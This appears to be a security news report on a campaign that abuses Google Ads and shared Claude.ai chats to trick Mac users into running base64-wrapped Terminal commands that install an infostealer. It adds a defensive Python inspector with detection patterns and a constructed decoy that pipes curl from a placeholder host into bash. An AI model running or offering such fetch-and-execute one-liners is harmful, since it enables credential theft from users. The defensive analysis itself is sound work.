TL;DR
Hackers are using Google Ads and malicious Claude.ai shared chats to spread Mac malware. The campaign involves convincing social engineering and polymorphic payloads, targeting Mac users who search for Claude downloads.
Cybercriminals are actively abusing Google Ads and legitimate Claude.ai shared chats to distribute malware targeting Mac users, according to recent security research. This campaign leverages trusted platforms and social engineering, making it particularly dangerous for unsuspecting users.
Security engineer Berk Albayrak of Trendyol Group first identified the campaign: shared Claude.ai chats that mimic official installation guides and instruct users to run terminal commands. The chats follow a similar structure, but the payloads they fetch are served from different domains and are built to infect Macs.
The infection chain starts with a base64-encoded shell command. Once decoded, it downloads a polymorphic ‘loader.sh’ script and executes it entirely in memory, so no file is written to disk for an on-access scanner to inspect. The loader checks for specific regional keyboard settings, exfiltrates basic system information, and then downloads a second-stage payload that harvests browser credentials, cookies, and Keychain data. One variant identified by Albayrak appears to select victims by regional settings and skips the profiling step, exfiltrating data directly.
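The decisive step in this chain is a user pasting an opaque, base64-wrapped one-liner into Terminal. The following inspector is an added example, not code from the article or from Albayrak's research: it peels back base64 layers in a command and flags the fetch-and-pipe-to-shell pattern that executes remote code without touching disk. It can be run on a command before pasting it, or over shell history lines when triaging a possibly infected Mac. The sample commands, domains and paths in it are constructed placeholders, not indicators from the campaign, and the pattern list is a judgement call rather than a published signature.

```python
"""Inspect shell one-liners for hidden, in-memory code execution (added example).

Constructed samples only; 'example.invalid' and the paths are placeholders.
"""
import base64
import binascii
import re

# Patterns a practitioner would refuse to run without reading what they fetch.
SUSPICIOUS_PATTERNS = [
    ("pipe_to_shell", re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("process_substitution_shell", re.compile(r"\b(ba|z)?sh\s+<\(\s*(curl|wget)\b")),
    ("command_substitution_shell", re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")),
    ("remote_fetch", re.compile(r"\b(curl|wget)\b")),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("eval", re.compile(r"\beval\b")),
    # macOS keyboard-layout / language lookups, the kind of regional check the article describes.
    ("keyboard_layout_check", re.compile(r"AppleKeyboardLayouts|AppleLanguages|HIToolbox")),
]

# A run of standard-alphabet base64 long enough to hide a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# zsh extended-history prefix, e.g. ": 1700000000:0;cmd"
ZSH_HISTORY_PREFIX = re.compile(r"^: \d+:\d+;")


def _is_text(s):
    return all(c.isprintable() or c in "\n\t" for c in s)


def decode_blobs(cmd, max_depth=3):
    """Return every base64 blob embedded in cmd, decoded; recurse into nested blobs."""
    found = []
    for m in B64_BLOB.finditer(cmd):
        blob = m.group(0)
        padded = blob + "=" * (-len(blob) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # random identifier that merely looks like base64
        if not _is_text(text):
            continue
        found.append(text)
        if max_depth > 0:
            found.extend(decode_blobs(text, max_depth - 1))
    return found


def inspect_command(cmd):
    """Analyse one command line across all its decoded layers."""
    layers = [cmd] + decode_blobs(cmd)
    hits = set()
    for layer in layers:
        for name, rx in SUSPICIOUS_PATTERNS:
            if rx.search(layer):
                hits.add(name)
    # Remote fetch feeding a shell directly is the in-memory execution pattern:
    # the fetched script never exists as a file an on-access scanner could see.
    in_memory_exec = "remote_fetch" in hits and bool(
        hits & {"pipe_to_shell", "process_substitution_shell", "command_substitution_shell"})
    if in_memory_exec or "base64_decode" in hits:
        verdict = "DO_NOT_RUN_BLIND"
    elif hits:
        verdict = "REVIEW"
    else:
        verdict = "OK"
    return {"command": cmd, "decoded_layers": layers[1:], "hits": sorted(hits),
            "in_memory_exec": in_memory_exec, "verdict": verdict}


def triage_history(lines):
    """Run inspect_command over shell history lines; return only the flagged results."""
    flagged = []
    for line in lines:
        line = ZSH_HISTORY_PREFIX.sub("", line.strip())
        if not line:
            continue
        result = inspect_command(line)
        if result["verdict"] != "OK":
            flagged.append(result)
    return flagged


# Constructed sample: a decoy of the kind a fake install guide might show. The inner
# command is wrapped in base64 so the reader never sees the curl | bash.
SAMPLE_INNER = "curl -fsSL https://example.invalid/loader.sh | bash"
SAMPLE_DECOY = "echo '%s' | base64 -D | bash" % base64.b64encode(SAMPLE_INNER.encode()).decode()
SAMPLE_HISTORY = [": 1700000000:0;ls -la", ": 1700000001:0;brew update",
                  ": 1700000002:0;" + SAMPLE_DECOY, ": 1700000003:0;git status"]

if __name__ == "__main__":
    for r in (inspect_command(SAMPLE_DECOY), inspect_command("xcode-select --install")):
        print(r["verdict"], r["hits"], r["decoded_layers"])
    print(len(triage_history(SAMPLE_HISTORY)), "flagged history line(s)")
```

Legitimate installers also use the fetch-and-pipe pattern, so the verdict is deliberately "do not run blind" rather than "malicious": the right response is to fetch the script separately, read it, and confirm the hosting domain against the vendor's official site before executing anything.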
In both variants the Google Ad itself points to the genuine claude.ai domain, so the link passes casual inspection; the malicious instructions sit inside the shared-chat feature, which is abused purely for social engineering, while the payloads are fetched from attacker-controlled, legitimate-looking domains. Researchers confirmed that the infrastructure uses polymorphic techniques that complicate signature-based detection, and that the payloads are built for macOS, including a variant of the MacSync infostealer.
Why It Matters
This campaign underscores the evolving tactics of cybercriminals who are exploiting AI platforms and legitimate advertising channels to target Mac users. The use of shared AI chats for malware distribution bypasses traditional URL filtering and leverages the trust users place in familiar platforms. The malware’s ability to run entirely in memory and exfiltrate sensitive data poses significant security risks, especially as Mac malware becomes more sophisticated.
Background
Malvertising campaigns have a long history of delivering malware through fake or compromised ads, but recent efforts have increasingly targeted AI platforms like ChatGPT and now Claude.ai. In December, similar attacks exploited shared chat features for malware delivery. This campaign is notable for using genuine Google Ads linking to authentic Claude.ai domains, with malicious instructions embedded within shared chats, complicating detection efforts.
Security researchers have observed multiple variants employing polymorphic payloads and region-based checks, indicating a targeted approach. The campaign highlights the importance of cautious behavior when following terminal commands from unverified sources, even within trusted AI chat environments.
“The shared Claude.ai chats are being weaponized with social engineering to trick users into running malicious commands that silently infect their Macs.”
— Berk Albayrak, security engineer at Trendyol Group
“The malware employs polymorphic techniques and region-based checks to evade detection and target specific users, exfiltrating sensitive data without alerting the victim.”
— BleepingComputer
What Remains Unclear
It remains unclear how widespread this campaign is, whether other platforms are being exploited similarly, and if additional variants of the malware exist. The full scope of the infrastructure and the operators behind the campaign are still under investigation. Additionally, the effectiveness of current detection and mitigation measures against these specific payloads is not yet fully known.
What’s Next
Security researchers and platform providers are expected to continue monitoring the campaign, with potential updates on the scope and scale. Users are advised to avoid clicking on suspicious ads and terminal commands from untrusted sources. Further technical analysis may reveal additional variants or infrastructure used by the attackers. Companies like Google and Anthropic are likely to implement additional safeguards to prevent such abuse.
Key Questions
How can I protect my Mac from this malware?
Never paste a command from a chat, ad, or web page into Terminal without understanding what it does. Decode any base64 blob before running it, and treat any one-liner that pipes curl or wget output into sh or bash as untrusted, however official the page looks. Download Claude and other software only from the vendor's official site, and keep macOS and your security software up to date.
Are Google Ads involved in this campaign?
Yes, attackers are abusing Google Ads to direct users to malicious shared chats on Claude.ai, making the campaign more convincing and harder to detect.
Can this malware infect other operating systems?
Currently, the malware targets macOS specifically. There is no confirmed evidence of similar campaigns targeting Windows or Linux systems, but threat actors may adapt their tactics.
What should I do if I suspect I’ve been infected?
Disconnect the Mac from the network first, then run a full scan with reputable security software and seek professional help if needed. Because this malware targets browser credentials, cookies, and Keychain data, assume anything stored there is compromised: change those passwords from a clean device, revoke active browser sessions, and check that multi-factor authentication is enabled on important accounts. Avoid running unknown terminal commands in the future.